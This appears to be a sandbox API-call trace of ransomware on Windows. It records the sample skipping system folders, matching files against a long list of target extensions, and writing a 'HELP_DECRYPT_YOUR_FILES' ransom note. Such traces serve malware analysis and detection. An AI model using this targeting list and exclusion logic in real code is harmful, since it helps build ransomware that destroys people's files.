	[0173.368] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.368] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.368] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x80d82bca, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80da8d75, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="..", cAlternateFileName="")) returned 1
	[0173.368] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.368] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80da8d75, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80da8d75, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80dcf0c4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.368] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d82bca, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80d82bca, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80da8d75, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.369] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0173.369] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0173.369] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0173.369] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov"
	[0173.369] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\"
	[0173.369] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime"
	[0173.369] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime"
	[0173.369] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\"
	[0173.369] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\"
	[0173.370] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*"
	[0173.370] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName=".", cAlternateFileName="")) returned 0xfb91f0
	[0173.370] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*") returned 97
	[0173.370] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.370] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*") returned 0x61
	[0173.370] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0173.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0173.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.371] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0173.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.372] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.379] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0173.379] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.379] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0173.379] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.379] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.380] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0173.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.380] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0173.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.380] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0173.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.380] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0173.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.381] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0173.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.381] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.381] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0173.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.382] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0173.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.382] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0173.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.382] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0173.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.382] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0173.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.383] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0173.383] FindNextFileW (in: hFindFile=0xfb91f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="..", cAlternateFileName="")) returned 1
	[0173.383] FindNextFileW (in: hFindFile=0xfb91f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16203b1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa16203b1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0173.383] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0173.383] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0173.383] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\"
	[0173.384] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml"
	[0173.384] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0173.384] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.384] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0173.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.384] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.384] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml"
	[0173.384] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml") returned 109
	[0173.385] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.385] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0173.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.385] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0173.385] FindNextFileW (in: hFindFile=0xfb91f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16203b1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa16203b1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0173.386] FindClose (in: hFindFile=0xfb91f0 | out: hFindFile=0xfb91f0) returned 1
	[0173.386] FindClose (in: hFindFile=0xfb91f0 | out: hFindFile=0xfb91f0) returned 0
	[0173.386] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime"
	[0173.386] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*"
	[0173.387] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.387] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.387] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0173.387] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
